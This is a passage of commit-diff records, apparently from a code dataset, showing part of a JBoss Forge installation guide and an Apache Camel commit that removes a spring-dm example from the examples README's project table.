$\n----\n\n=== That's it! You've got Forge installed, but what to do next?\n\nYou can start by Forging your first http:\/\/forge.jboss.org\/document\/write-a-java-ee-web-application-basic[Java EE webapp in about five minutes], and there are a few things you should probably check-out. If you are confused at any time, try pressing *TAB*. For instance, if you have not yet seen the Forge built-in commands, you may either press TAB to see a list of the currently available commands, or get a more descriptive list by typing:\n\n[source]\n----\n$ command-list\n----\n\nYou may also use the `man` command for more detailed information about available Forge, a plugin, or a command.\n\n[source]\n----\n$ man {command-name}\n----\n","old_contents":"== Installing Forge\n\nInstalling Forge is a relatively short process, and this guide will take you through the fundamentals (providing links to external materials if required) however, if you encounter any issues with this process, please ask in the Forge Users mailing list, or if you think something is wrong with this guide, report a defect to the team.\n\n=== Install a Forge Distribution\n\nFollow these steps to install a Forge distribution:\n\n*1. Ensure that you have already installed http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[a Java 7+ JDK].*\n\n*2. https:\/\/repository.jboss.org\/nexus\/service\/local\/artifact\/maven\/redirect?r=releases&g=org.jboss.forge&a=forge-distribution&v=LATEST&e=zip&c=offline[Download] and Un-zip Forge into a folder on your hard-disk, this folder will be your `FORGE_HOME`*\n\n*3. Add `$FORGE_HOME\/bin` to your path (http:\/\/www.google.com\/search?q=windows+edit+path[windows], http:\/\/www.google.com\/search?q=linux+set+path[linux], http:\/\/www.google.com\/search?q=mac+osx+edit+path[mac osx])*\n\nOn Unix based operating systems, this typically means editing your `~\/.bashrc` or `~\/.profile`; you will need to the following entries:\n\n[source]\n----\nexport FORGE_HOME=~\/forge\/\nexport PATH=$PATH:$FORGE_HOME\/bin\n----\n\nWhile on Windows, you will need to right-click on open the \"Control Panel\", then click \"System Properties\", open the \"Advanced\" tab, then click \"Environment Variables\" and add these two entries visually. It is recommended to set User variables for Forge, unless you have placed the unzipped distribution in a folder where all users can access it.\n\n****\nYou may also simply create a shortcut to `bin\/forge` (Unix,) or `bin\\forge.bat` (Windows,) and place it on your Desktop.\n****\n\n*4. Consider installing http:\/\/git-scm.com\/[Git] and http:\/\/maven.apache.org\/[Maven 3.1+] (both optional)*\n\n*5. Open a command prompt and run `forge` - located in $FORGE_HOME\/bin\/ (if you are on Windows, you will need to run `forge.bat` unless using a Unix-style terminal)*\n\n[source]\n----\nlocalhost:~ $ forge\n[~] $\n----\n\n=== That's it! You've got Forge installed, but what to do next?\n\nYou can start by Forging your first http:\/\/forge.jboss.org\/document\/write-a-java-ee-web-application-basic[Java EE webapp in about five minutes], and there are a few things you should probably check-out. If you are confused at any time, try pressing *TAB*. For instance, if you have not yet seen the Forge built-in commands, you may either press TAB to see a list of the currently available commands, or get a more descriptive list by typing:\n\n[source]\n----\n$ command-list\n----\n\nYou may also use the `man` command for more detailed information about available Forge, a plugin, or a command.\n\n[source]\n----\n$ man {command-name}\n----\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a3bbb2011283a42f50045d689ab9ad2433300037","subject":"CAMEL-11059: Remove example that was using spring-dm","message":"CAMEL-11059: Remove example that was using spring-dm\n","repos":"tdiesler\/camel,tadayosi\/camel,Fabryprog\/camel,akhettar\/camel,pkletsko\/camel,mgyongyosi\/camel,christophd\/camel,alvinkwekel\/camel,rmarting\/camel,pkletsko\/camel,punkhorn\/camel-upstream,anoordover\/camel,snurmine\/camel,ullgren\/camel,rmarting\/camel,nikhilvibhav\/camel,drsquidop\/camel,christophd\/camel,anton-k11\/camel,CodeSmell\/camel,curso007\/camel,tadayosi\/camel,cunningt\/camel,davidkarlsen\/camel,pkletsko\/camel,jamesnetherton\/camel,acartapanis\/camel,nboukhed\/camel,nboukhed\/camel,apache\/camel,apache\/camel,tdiesler\/camel,scranton\/camel,tlehoux\/camel,snurmine\/camel,gautric\/camel,prashant2402\/camel,CodeSmell\/camel,scranton\/camel,nicolaferraro\/camel,isavin\/camel,dmvolod\/camel,rmarting\/camel,rmarting\/camel,akhettar\/camel,yuruki\/camel,adessaigne\/camel,tlehoux\/camel,Thopap\/camel,snurmine\/camel,jonmcewen\/camel,alvinkwekel\/camel,prashant2402\/camel,rmarting\/camel,DariusX\/camel,pax95\/camel,prashant2402\/camel,anton-k11\/camel,gnodet\/camel,acartapanis\/camel,alvinkwekel\/camel,gautric\/camel,scranton\/camel,ullgren\/camel,tadayosi\/camel,adessaigne\/camel,curso007\/camel,mcollovati\/camel,drsquidop\/camel,objectiser\/camel,Thopap\/camel,gnodet\/camel,tdiesler\/camel,onders86\/camel,akhettar\/camel,sverkera\/camel,tlehoux\/camel,zregvart\/camel,nboukhed\/camel,yuruki\/camel,jonmcewen\/camel,apache\/camel,dmvolod\/camel,zregvart\/camel,akhettar\/camel,tdiesler\/camel,gautric\/camel,tlehoux\/camel,jamesnetherton\/camel,drsquidop\/camel,nicolaferraro\/camel,nboukhed\/camel,kevinearls\/camel,Thopap\/camel,adessaigne\/camel,drsquidop\/camel,sverkera\/camel,gnodet\/camel,nikhilvibhav\/camel,acartapanis\/camel,Thopap\/camel,tadayosi\/camel,jamesnetherton\/camel,jamesnetherton\/camel,anton-k11\/camel,scranton\/camel,pkletsko\/camel,sverkera\/camel,anoordover\/camel,curso007\/camel,gautric\/camel,mcollovati\/camel,pax95\/camel,pmoerenhout\/camel,anton-k11\/camel,pmoerenhout\/camel,Fabryprog\/camel,Fabryprog\/camel,onders86\/camel,apache\/camel,yuruki\/camel,alvinkwekel\/camel,davidkarlsen\/camel,sverkera\/camel,anoordover\/camel,scranton\/camel,isavin\/camel,DariusX\/camel,CodeSmell\/camel,curso007\/camel,drsquidop\/camel,yuruki\/camel,jonmcewen\/camel,onders86\/camel,curso007\/camel,onders86\/camel,Thopap\/camel,tlehoux\/camel,ullgren\/camel,jonmcewen\/camel,zregvart\/camel,nicolaferraro\/camel,DariusX\/camel,salikjan\/camel,pmoerenhout\/camel,anoordover\/camel,dmvolod\/camel,gautric\/camel,kevinearls\/camel,prashant2402\/camel,jamesnetherton\/camel,adessaigne\/camel,snurmine\/camel,jamesnetherton\/camel,isavin\/camel,pmoerenhout\/camel,pmoerenhout\/camel,onders86\/camel,ullgren\/camel,mcollovati\/camel,yuruki\/camel,nicolaferraro\/camel,isavin\/camel,tdiesler\/camel,tdiesler\/camel,cunningt\/camel,nikhilvibhav\/camel,objectiser\/camel,drsquidop\/camel,snurmine\/camel,cunningt\/camel,acartapanis\/camel,acartapanis\/camel,kevinearls\/camel,mcollovati\/camel,objectiser\/camel,anton-k11\/camel,onders86\/camel,sverkera\/camel,acartapanis\/camel,zregvart\/camel,nikhilvibhav\/camel,apache\/camel,tadayosi\/camel,apache\/camel,tlehoux\/camel,mgyongyosi\/camel,davidkarlsen\/camel,pkletsko\/camel,curso007\/camel,jonmcewen\/camel,anoordover\/camel,mgyongyosi\/camel,christophd\/camel,pax95\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,christophd\/camel,salikjan\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,adessaigne\/camel,dmvolod\/camel,punkhorn\/camel-upstream,gautric\/camel,davidkarlsen\/camel,dmvolod\/camel,tadayosi\/camel,prashant2402\/camel,pax95\/camel,sverkera\/camel,rmarting\/camel,jonmcewen\/camel,akhettar\/camel,mgyongyosi\/camel,gnodet\/camel,isavin\/camel,kevinearls\/camel,objectiser\/camel,scranton\/camel,Thopap\/camel,mgyongyosi\/camel,prashant2402\/camel,punkhorn\/camel-upstream,nboukhed\/camel,kevinearls\/camel,pmoerenhout\/camel,pax95\/camel,akhettar\/camel,cunningt\/camel,cunningt\/camel,nboukhed\/camel,adessaigne\/camel,dmvolod\/camel,mgyongyosi\/camel,anoordover\/camel,kevinearls\/camel,CodeSmell\/camel,christophd\/camel,DariusX\/camel,pkletsko\/camel,cunningt\/camel,snurmine\/camel,yuruki\/camel,isavin\/camel,anton-k11\/camel","old_file":"examples\/README.adoc","new_file":"examples\/README.adoc","new_contents":"# Welcome to the Apache Camel Examples\n\n### Introduction\n\nThis directory contains the various examples for working with Apache\nCamel. The examples can be run using Maven. When using the Maven\ncommand, Maven will attempt to download the required dependencies from a\ncentral repository to your local repository.\nView the individual example READMEs for details.\n\n### Examples\n\n\/\/ examples: START\nNumber of Examples: 90 (9 deprecated)\n\n[width=\"100%\",cols=\"4,2,4\",options=\"header\"]\n|=======================================================================\n| Example | Category | Description\n\n| link:camel-example-cdi\/README.md[CDI] (camel-example-cdi) | Beginner | An example showing how to work with Camel and CDI for dependency injection\n\n| link:camel-example-cdi-properties\/README.md[CDI Properties] (camel-example-cdi-properties) | Beginner | DeltaSpike configuration properties CDI example\n\n| link:camel-example-cdi-xml\/README.md[CDI Camel XML] (camel-example-cdi-xml) | Beginner | CDI and Camel XML example\n\n| link:camel-example-console\/README.md[Console] (camel-example-console) | Beginner | An example that reads input from the console\n\n| link:camel-example-ftp\/README.md[FTP] (camel-example-ftp) | Beginner | An example for showing Camel FTP integration\n\n| link:camel-example-java8\/readme.adoc[Java8] (camel-example-java8) | Beginner | An example for showing Camel DSL for Java 8\n\n| link:camel-example-pojo-messaging\/README.md[POJO Routing] (camel-example-pojo-messaging) | Beginner | An example showing how to produce and consume messages from Camel endpoints using annotated POJOs\n \n\n| link:camel-example-reload\/Readme.md[Reload] (camel-example-reload) | Beginner | An example that live reloads routes when the XML file is updated\n\n| link:camel-example-rest-swagger\/README.md[Rest Swagger] (camel-example-rest-swagger) | Beginner | This example shows how to call a REST service defined using Swagger specification\n\n| link:camel-example-servlet-tomcat\/README.md[Servlet Tomcat] (camel-example-servlet-tomcat) | Beginner | An example using Camel Servlet with Apache Tomcat\n\n| link:camel-example-servlet-tomcat-no-spring\/README.md[Servlet Tomcat without Spring] (camel-example-servlet-tomcat-no-spring) | Beginner | An example using Camel Servlet with Apache Tomcat without using Spring\n\n| link:camel-example-spring\/README.md[Spring] (camel-example-spring) | Beginner | An example showing how to work with Camel and Spring\n\n| link:camel-example-spring-boot\/readme.adoc[Spring Boot] (camel-example-spring-boot) | Beginner | An example showing how to work with Camel and Spring Boot\n\n| link:camel-example-spring-boot-live-reload\/readme.adoc[Spring Boot Live Reload] (camel-example-spring-boot-live-reload) | Beginner | An example showing how to use the live reload feature of Spring Boot with Camel\n\n| link:camel-example-spring-javaconfig\/README.md[Spring Java Config] (camel-example-spring-javaconfig) | Beginner | An example showing how to work with Camel and Spring Java Config\n\n| link:camel-example-spring-xquery\/README.md[Spring XQuery] (camel-example-spring-xquery) | Beginner | An example using Spring XML to transform a message using XQuery\n\n| link:camel-example-widget-gadget-cdi\/README.md[Widget Gadget CDI] (camel-example-widget-gadget-cdi) | Beginner | The widget and gadget example from the EIP book\n\n| link:camel-example-widget-gadget-java\/README.md[Widget Gadget Java] (camel-example-widget-gadget-java) | Beginner | The widget and gadget example from the EIP book\n\n| link:camel-example-widget-gadget-xml\/README.md[Widget Gadget XML] (camel-example-widget-gadget-xml) | Beginner | The widget and gadget example from the EIP book\n\n| link:camel-example-cassandra-kubernetes\/ReadMe.md[Cassandra Kubernetes] (camel-example-cassandra-kubernetes) | Cloud | An example with Camel and Cassandra running on Kubernetes\n\n| link:camel-example-cdi-aws-s3\/README.md[CDI AWS S3] (camel-example-cdi-aws-s3) | Cloud | AWS S3 CDI example\n\n| link:camel-example-cdi-kubernetes\/README.md[CDI Kubernetes] (camel-example-cdi-kubernetes) | Cloud | An example running Camel CDI on Kubernetes\n\n| link:camel-example-hazelcast-kubernetes\/ReadMe.md[Hazelcast Kubernetes] (camel-example-hazelcast-kubernetes) | Cloud | An example with Camel and Hazelcast running on Kubernetes\n\n| link:camel-example-spring-boot-servicecall\/README.adoc[Spring Boot Servicecall] (camel-example-spring-boot-servicecall) | Cloud | An example showing how to work with Camel ServiceCall EIP and Spring Boot\n\n| link:camel-example-spring-cloud-servicecall\/README.adoc[Spring Cloud Servicecall] (camel-example-spring-cloud-servicecall) | Cloud | An example showing how to work with Camel ServiceCall EIP and Spring Cloud\n\n| link:camel-example-cdi-cassandraql\/README.md[CDI Cassandra] (camel-example-cdi-cassandraql) | Database | Cassandraql CDI example\n\n| link:camel-example-jdbc\/README.md[JDBC] (camel-example-jdbc) | Database | An example for showing Camel using JDBC component\n\n| link:camel-example-mybatis\/README.md[MyBatis] (camel-example-mybatis) | Database | An example for showing Camel using MyBatis SQL mapper component\n\n| link:camel-example-spring-boot-rest-jpa\/README.md[Spring Boot REST JPA] (camel-example-spring-boot-rest-jpa) | Database | An example demonstrating how to use Camel REST DSL with JPA to expose a RESTful API that performs CRUD operations on a database\n\n| link:camel-example-sql\/README.md[SQL] (camel-example-sql) | Database | An example for showing Camel using SQL component\n\n| link:camel-example-aggregate\/README.md[Aggregate] (camel-example-aggregate) | EIP | Demonstrates the persistent support for the Camel aggregator\n\n| link:camel-example-cafe\/README.md[Cafe] (camel-example-cafe) | EIP | A cafe example showing how to work with Camel\n\n| link:camel-example-etl\/README.md[ETL] (camel-example-etl) | EIP | An example showing how to use Camel as an Extract Transform and Load (ETL) tool\n\n| link:camel-example-hystrix\/README.md[Hystrix] (camel-example-hystrix) | EIP | An example showing how to use Hystrix EIP as circuit breaker in Camel routes\n\n| link:camel-example-loadbalancing\/README.md[Load Balancing] (camel-example-loadbalancing) | EIP | An example that demonstrate load balancing messaging with mina servers (TCP\/IP)\n\n| link:camel-example-loan-broker-cxf\/README.md[Loan Broker WebService] (camel-example-loan-broker-cxf) | EIP | An example that shows the EIP's loan broker demo\n\n| link:camel-example-loan-broker-jms\/README.md[Loan Broker JMS] (camel-example-loan-broker-jms) | EIP | An example that shows the EIP's loan broker demo using JMS\n\n| link:camel-example-route-throttling\/README.md[Route Throttling] (camel-example-route-throttling) | EIP | A client-server example using JMS transport where we on the server side can throttle the Camel\n route dynamically based on the flow of messages\n \n\n| link:camel-example-transformer-blueprint\/README.md[Transformer OSGi Blueprint] (camel-example-transformer-blueprint) | Input\/Output Type Contract | An example demonstrating declarative transformation along data type declaration using OSGi Blueprint XML\n\n| link:camel-example-transformer-cdi\/README.md[Transformer CDI] (camel-example-transformer-cdi) | Input\/Output Type Contract | An example demonstrating declarative transformation along data type declaration using Java DSL and CDI\n \n\n| link:camel-example-transformer-demo\/README.md[Transformer and Validator Spring XML] (camel-example-transformer-demo) | Input\/Output Type Contract | An example demonstrating declarative transformation and validation along data type declaration using Spring DSL\n\n| link:camel-example-validator-spring-boot\/readme.adoc[Validator Spring Boot] (camel-example-validator-spring-boot) | Input\/Output Type Contract | An example showing how to work with declarative validation and Spring Boot\n\n| link:camel-example-bam\/README.md[BAM (deprecated)] (camel-example-bam) | Management and Monitoring | *deprecated* An example showing how to use Camel as a Business Activity Monitoring tool\n\n| link:camel-example-cdi-metrics\/README.md[CDI Metrics] (camel-example-cdi-metrics) | Management and Monitoring | Dropwizard Metrics CDI example\n\n| link:camel-example-jmx\/README.md[JMX] (camel-example-jmx) | Management and Monitoring | An example showing how to work with Camel and JMX\n\n| link:camel-example-management\/README.md[Management] (camel-example-management) | Management and Monitoring | An example for showing Camel JMX management\n\n| link:camel-example-opentracing\/README.md[OpenTracing] (camel-example-opentracing) | Management and Monitoring | An example showing how to trace incoming and outgoing messages from Camel with OpenTracing\n\n| link:camel-example-splunk\/README.md[Splunk] (camel-example-splunk) | Management and Monitoring | An example using Splunk\n\n| link:camel-example-spring-boot-metrics\/README.md[Spring Boot Metrics] (camel-example-spring-boot-metrics) | Management and Monitoring | An example showing how to work with Camel and Spring Boot and report metrics to Graphite\n\n| link:camel-example-tracer\/README.md[Tracer] (camel-example-tracer) | Management and Monitoring | *deprecated* An example showing how to persist Camel trace event messages using JPA\n\n| link:camel-example-zipkin\/README.md[Zipkin] (camel-example-zipkin) | Management and Monitoring | An example showing how to trace incoming and outgoing messages from Camel with Zipkin\n\n| link:camel-example-activemq-tomcat\/README.md[ActiveMQ Tomcat] (camel-example-activemq-tomcat) | Messaging | An example using ActiveMQ Broker and Camel with Apache Tomcat\n\n| link:camel-example-guice-jms\/README.md[Guice JMS] (camel-example-guice-jms) | Messaging | *deprecated* An example showing how to work with Camel, Guice and JMS\n\n| link:camel-example-jms-file\/README.md[JMS-File] (camel-example-jms-file) | Messaging | An example that persists messages from JMS to files\n\n| link:camel-example-kafka\/README.adoc[Kafka] (camel-example-kafka) | Messaging | An example for Kafka\n\n| link:camel-example-spring-jms\/README.md[Spring JMS] (camel-example-spring-jms) | Messaging | An example using Spring XML to talk to the JMS server from different kind of client techniques\n\n| link:camel-example-cdi-osgi\/README.md[CDI OSGi] (camel-example-cdi-osgi) | OSGi | *deprecated* PAX CDI example\n\n| link:camel-example-cxf-blueprint\/README.md[CXF Blueprint] (camel-example-cxf-blueprint) | OSGi | An example which use a CXF consumer and the OSGI HTTP Service\n\n| link:camel-example-cxf-osgi\/README.md[CXF OSGi] (camel-example-cxf-osgi) | OSGi | An example which use a CXF consumer and the OSGI HTTP Service\n\n| link:camel-example-netty-http\/README.md[Netty HTTP] (camel-example-netty-http) | OSGi | An example showing how to use a shared Netty HTTP server with multiple Camel applications in OSGi container\n\n| link:camel-example-osgi-rmi\/README.md[OSGi RMI] (camel-example-osgi-rmi) | OSGi | *deprecated* A OSGi example which exposes a RMI service.\n\n| link:camel-example-servlet-rest-blueprint\/README.md[Servlet REST Blueprint] (camel-example-servlet-rest-blueprint) | OSGi | An example using Servlet REST with OSGi Blueprint\n\n| link:camel-example-sql-blueprint\/README.md[SQL Blueprint] (camel-example-sql-blueprint) | OSGi | An example for showing Camel using SQL component with blueprint\n\n| link:camel-example-ssh\/README.md[SSH] (camel-example-ssh) | OSGi | A simple SSH example which creates a bundle that can be dropped into any OSGi container\n\n| link:camel-example-ssh-security\/README.md[SSH Security] (camel-example-ssh-security) | OSGi | A Certificate secured SSH example that creates a bundle that can be dropped into any OSGi container\n \n\n| link:camel-example-swagger-osgi\/README.md[Swagger OSGi] (camel-example-swagger-osgi) | OSGi | An example using REST DSL in XML and Swagger API\n\n| link:camel-example-groovy\/ReadMe.md[Groovy] (camel-example-groovy) | Other Languages | *deprecated* A Camel route using Groovy DSL\n\n| link:camel-example-kotlin\/ReadMe.md[Kotlin] (camel-example-kotlin) | Other Languages | A Camel route using Kotlin\n\n| link:camel-example-scala\/ReadMe.md[Scala] (camel-example-scala) | Other Languages | *deprecated* A Camel route using Scala\n\n| link:camel-example-java8-rx\/readme.adoc[Java8 RX] (camel-example-java8-rx) | Reactive | An example for showing Camel RX for Java 8\n\n| link:camel-example-reactive-streams\/readme.adoc[Reactive Streams] (camel-example-reactive-streams) | Reactive | An example that shows how Camel can exchange data using reactive streams with Spring Boot reactor\n\n| link:camel-example-cdi-rest-servlet\/README.md[CDI Rest] (camel-example-cdi-rest-servlet) | Rest | REST DSL \/ Servlet with CDI example\n\n| link:camel-example-rest-producer\/readme.adoc[Rest Producer] (camel-example-rest-producer) | Rest | An example showing how to use Camel Rest to call a REST service\n\n| link:camel-example-restlet-jdbc\/README.md[Restlet JDBC] (camel-example-restlet-jdbc) | Rest | An example showing how to create REST API with Camel Restlet and JDBC components\n\n| link:camel-example-spark-rest\/README.md[Spark REST] (camel-example-spark-rest) | Rest | An example using Spark REST\n\n| link:camel-example-spring-boot-rest-swagger\/README.adoc[Spring Boot Rest Swagger] (camel-example-spring-boot-rest-swagger) | Rest | An example showing Camel REST DSL and Swagger with Spring Boot\n\n| link:camel-example-swagger-cdi\/README.md[Swagger CDI] (camel-example-swagger-cdi) | Rest | An example using REST DSL and Swagger Java with CDI\n\n| link:camel-example-swagger-xml\/README.md[Swagger XML] (camel-example-swagger-xml) | Rest | An example using REST DSL in XML and Swagger with Swagger UI (web console)\n\n| link:camel-example-spring-security\/README.md[Spring Security] (camel-example-spring-security) | Security | An example showing how to work with Camel and Spring Security\n\n| link:camel-example-simplejirabot\/README.md[JIRA Bot] (camel-example-simplejirabot) | Social | An example showing how to work with RSS and IRC endpoints\n\n| link:camel-example-twitter-salesforce\/README.md[Twitter Salesforce] (camel-example-twitter-salesforce) | Social | Twitter mentions is created as contacts in Salesforce\n\n| link:camel-example-twitter-websocket\/README.md[Twitter Websocket] (camel-example-twitter-websocket) | Social | An example that pushes new tweets to a web page using web-socket\n\n| link:camel-example-twitter-websocket-blueprint\/README.md[Twitter Websocket Blueprint] (camel-example-twitter-websocket-blueprint) | Social | An example that pushes new tweets to a web page using web-socket\n\n| link:camel-example-cdi-test\/README.md[CDI Test] (camel-example-cdi-test) | Testing | An example illustrating Camel CDI testing features\n\n| link:camel-example-reportincident\/README.md[Report Incident] (camel-example-reportincident) | Tutorial | *deprecated* An example based on real life use case for reporting incidents using webservice that are transformed\n and send as emails to a backing system\n \n\n| link:camel-example-reportincident-wssecurity\/README.md[Report Incident WS-Security] (camel-example-reportincident-wssecurity) | Tutorial | *deprecated* An example based on real life use case for reporting incidents using webservice that are transformed\n and send as emails to a backing system. Client calling the WebService is authentified through WS-Security\n \n\n| link:camel-example-cxf\/README.md[CXF] (camel-example-cxf) | WebService | An example which demonstrates the use of the Camel CXF component\n\n| link:camel-example-cxf-proxy\/README.md[CXF Proxy] (camel-example-cxf-proxy) | WebService | An example which uses Camel to proxy a web service\n\n| link:camel-example-cxf-tomcat\/README.md[CXF Tomcat] (camel-example-cxf-tomcat) | WebService | An example using Camel CXF (code first) with Apache Tomcat\n\n| link:camel-example-spring-ws\/README.md[Spring WebService] (camel-example-spring-ws) | WebService | An example showing how to work with Camel and Spring Web Services\n|=======================================================================\n\/\/ examples: END\n\n\n### Forum, Help, etc\n\nIf you hit an problems please let us know on the Camel Forums <http:\/\/camel.apache.org\/discussion-forums.html>\n\nPlease help us make Apache Camel better - we appreciate any feedback you may\nhave. Enjoy!\n\nThe Camel riders!\n","old_contents":"# Welcome to the Apache Camel Examples\n\n### Introduction\n\nThis directory contains the various examples for working with Apache\nCamel. The examples can be run using Maven. When using the Maven\ncommand, Maven will attempt to download the required dependencies from a\ncentral repository to your local repository.\nView the individual example READMEs for details.\n\n### Examples\n\n\/\/ examples: START\nNumber of Examples: 92 (10 deprecated)\n\n[width=\"100%\",cols=\"4,2,4\",options=\"header\"]\n|=======================================================================\n| Example | Category | Description\n\n| link:camel-example-cdi\/README.md[CDI] (camel-example-cdi) | Beginner | An example showing how to work with Camel and CDI for dependency injection\n\n| link:camel-example-cdi-properties\/README.md[CDI Properties] (camel-example-cdi-properties) | Beginner | DeltaSpike configuration properties CDI example\n\n| link:camel-example-cdi-xml\/README.md[CDI Camel XML] (camel-example-cdi-xml) | Beginner | CDI and Camel XML example\n\n| link:camel-example-console\/README.md[Console] (camel-example-console) | Beginner | An example that reads input from the console\n\n| link:camel-example-ftp\/README.md[FTP] (camel-example-ftp) | Beginner | An example for showing Camel FTP integration\n\n| link:camel-example-java8\/readme.adoc[Java8] (camel-example-java8) | Beginner | An example for showing Camel DSL for Java 8\n\n| link:camel-example-pojo-messaging\/README.md[POJO Routing] (camel-example-pojo-messaging) | Beginner | An example showing how to produce and consume messages from Camel endpoints using annotated POJOs\n \n\n| link:camel-example-reload\/Readme.md[Reload] (camel-example-reload) | Beginner | An example that live reloads routes when the XML file is updated\n\n| link:camel-example-rest-swagger\/README.md[Rest Swagger] (camel-example-rest-swagger) | Beginner | This example shows how to call a REST service defined using Swagger specification\n\n| link:camel-example-servlet-tomcat\/README.md[Servlet Tomcat] (camel-example-servlet-tomcat) | Beginner | An example using Camel Servlet with Apache Tomcat\n\n| link:camel-example-servlet-tomcat-no-spring\/README.md[Servlet Tomcat without Spring] (camel-example-servlet-tomcat-no-spring) | Beginner | An example using Camel Servlet with Apache Tomcat without using Spring\n\n| link:camel-example-spring\/README.md[Spring] (camel-example-spring) | Beginner | An example showing how to work with Camel and Spring\n\n| link:camel-example-spring-boot\/readme.adoc[Spring Boot] (camel-example-spring-boot) | Beginner | An example showing how to work with Camel and Spring Boot\n\n| link:camel-example-spring-boot-live-reload\/readme.adoc[Spring Boot Live Reload] (camel-example-spring-boot-live-reload) | Beginner | An example showing how to use the live reload feature of Spring Boot with Camel\n\n| link:camel-example-spring-javaconfig\/README.md[Spring Java Config] (camel-example-spring-javaconfig) | Beginner | An example showing how to work with Camel and Spring Java Config\n\n| link:camel-example-spring-xquery\/README.md[Spring XQuery] (camel-example-spring-xquery) | Beginner | An example using Spring XML to transform a message using XQuery\n\n| link:camel-example-widget-gadget-cdi\/README.md[Widget Gadget CDI] (camel-example-widget-gadget-cdi) | Beginner | The widget and gadget example from the EIP book\n\n| link:camel-example-widget-gadget-java\/README.md[Widget Gadget Java] (camel-example-widget-gadget-java) | Beginner | The widget and gadget example from the EIP book\n\n| link:camel-example-widget-gadget-xml\/README.md[Widget Gadget XML] (camel-example-widget-gadget-xml) | Beginner | The widget and gadget example from the EIP book\n\n| link:camel-example-cassandra-kubernetes\/ReadMe.md[Cassandra Kubernetes] (camel-example-cassandra-kubernetes) | Cloud | An example with Camel and Cassandra running on Kubernetes\n\n| link:camel-example-cdi-aws-s3\/README.md[CDI AWS S3] (camel-example-cdi-aws-s3) | Cloud | AWS S3 CDI example\n\n| link:camel-example-cdi-kubernetes\/README.md[CDI Kubernetes] (camel-example-cdi-kubernetes) | Cloud | An example running Camel CDI on Kubernetes\n\n| link:camel-example-hazelcast-kubernetes\/ReadMe.md[Hazelcast Kubernetes] (camel-example-hazelcast-kubernetes) | Cloud | An example with Camel and Hazelcast running on Kubernetes\n\n| link:camel-example-spring-boot-servicecall\/README.adoc[Spring Boot Servicecall] (camel-example-spring-boot-servicecall) | Cloud | An example showing how to work with Camel ServiceCall EIP and Spring Boot\n\n| link:camel-example-spring-cloud-servicecall\/README.adoc[Spring Cloud Servicecall] (camel-example-spring-cloud-servicecall) | Cloud | An example showing how to work with Camel ServiceCall EIP and Spring Cloud\n\n| link:camel-example-cdi-cassandraql\/README.md[CDI Cassandra] (camel-example-cdi-cassandraql) | Database | Cassandraql CDI example\n\n| link:camel-example-jdbc\/README.md[JDBC] (camel-example-jdbc) | Database | An example for showing Camel using JDBC component\n\n| link:camel-example-mybatis\/README.md[MyBatis] (camel-example-mybatis) | Database | An example for showing Camel using MyBatis SQL mapper component\n\n| link:camel-example-spring-boot-rest-jpa\/README.md[Spring Boot REST JPA] (camel-example-spring-boot-rest-jpa) | Database | An example demonstrating how to use Camel REST DSL with JPA to expose a RESTful API that performs CRUD operations on a database\n\n| link:camel-example-sql\/README.md[SQL] (camel-example-sql) | Database | An example for showing Camel using SQL component\n\n| link:camel-example-aggregate\/README.md[Aggregate] (camel-example-aggregate) | EIP | Demonstrates the persistent support for the Camel aggregator\n\n| link:camel-example-cafe\/README.md[Cafe] (camel-example-cafe) | EIP | A cafe example showing how to work with Camel\n\n| link:camel-example-etl\/README.md[ETL] (camel-example-etl) | EIP | An example showing how to use Camel as an Extract Transform and Load (ETL) tool\n\n| link:camel-example-hystrix\/README.md[Hystrix] (camel-example-hystrix) | EIP | An example showing how to use Hystrix EIP as circuit breaker in Camel routes\n\n| link:camel-example-loadbalancing\/README.md[Load Balancing] (camel-example-loadbalancing) | EIP | An example that demonstrate load balancing messaging with mina servers (TCP\/IP)\n\n| link:camel-example-loan-broker-cxf\/README.md[Loan Broker WebService] (camel-example-loan-broker-cxf) | EIP | An example that shows the EIP's loan broker demo\n\n| link:camel-example-loan-broker-jms\/README.md[Loan Broker JMS] (camel-example-loan-broker-jms) | EIP | An example that shows the EIP's loan broker demo using JMS\n\n| link:camel-example-route-throttling\/README.md[Route Throttling] (camel-example-route-throttling) | EIP | A client-server example using JMS transport where we on the server side can throttle the Camel\n route dynamically based on the flow of messages\n \n\n| link:camel-example-transformer-blueprint\/README.md[Transformer OSGi Blueprint] (camel-example-transformer-blueprint) | Input\/Output Type Contract | An example demonstrating declarative transformation along data type declaration using OSGi Blueprint XML\n\n| link:camel-example-transformer-cdi\/README.md[Transformer CDI] (camel-example-transformer-cdi) | Input\/Output Type Contract | An example demonstrating declarative transformation along data type declaration using Java DSL and CDI\n \n\n| link:camel-example-transformer-demo\/README.md[Transformer and Validator Spring XML] (camel-example-transformer-demo) | Input\/Output Type Contract | An example demonstrating declarative transformation and validation along data type declaration using Spring DSL\n\n| link:camel-example-validator-spring-boot\/readme.adoc[Validator Spring Boot] (camel-example-validator-spring-boot) | Input\/Output Type Contract | An example showing how to work with declarative validation and Spring Boot\n\n| link:camel-example-bam\/README.md[BAM (deprecated)] (camel-example-bam) | Management and Monitoring | *deprecated* An example showing how to use Camel as a Business Activity Monitoring tool\n\n| link:camel-example-cdi-metrics\/README.md[CDI Metrics] (camel-example-cdi-metrics) | Management and Monitoring | Dropwizard Metrics CDI example\n\n| link:camel-example-jmx\/README.md[JMX] (camel-example-jmx) | Management and Monitoring | An example showing how to work with Camel and JMX\n\n| link:camel-example-management\/README.md[Management] (camel-example-management) | Management and Monitoring | An example for showing Camel JMX management\n\n| link:camel-example-opentracing\/README.md[OpenTracing] (camel-example-opentracing) | Management and Monitoring | An example showing how to trace incoming and outgoing messages from Camel with OpenTracing\n\n| link:camel-example-splunk\/README.md[Splunk] (camel-example-splunk) | Management and Monitoring | An example using Splunk\n\n| link:camel-example-spring-boot-metrics\/README.md[Spring Boot Metrics] (camel-example-spring-boot-metrics) | Management and Monitoring | An example showing how to work with Camel and Spring Boot and report metrics to Graphite\n\n| link:camel-example-tracer\/README.md[Tracer] (camel-example-tracer) | Management and Monitoring | *deprecated* An example showing how to persist Camel trace event messages using JPA\n\n| link:camel-example-zipkin\/README.md[Zipkin] (camel-example-zipkin) | Management and Monitoring | An example showing how to trace incoming and outgoing messages from Camel with Zipkin\n\n| link:camel-example-activemq-tomcat\/README.md[ActiveMQ Tomcat] (camel-example-activemq-tomcat) | Messaging | An example using ActiveMQ Broker and Camel with Apache Tomcat\n\n| 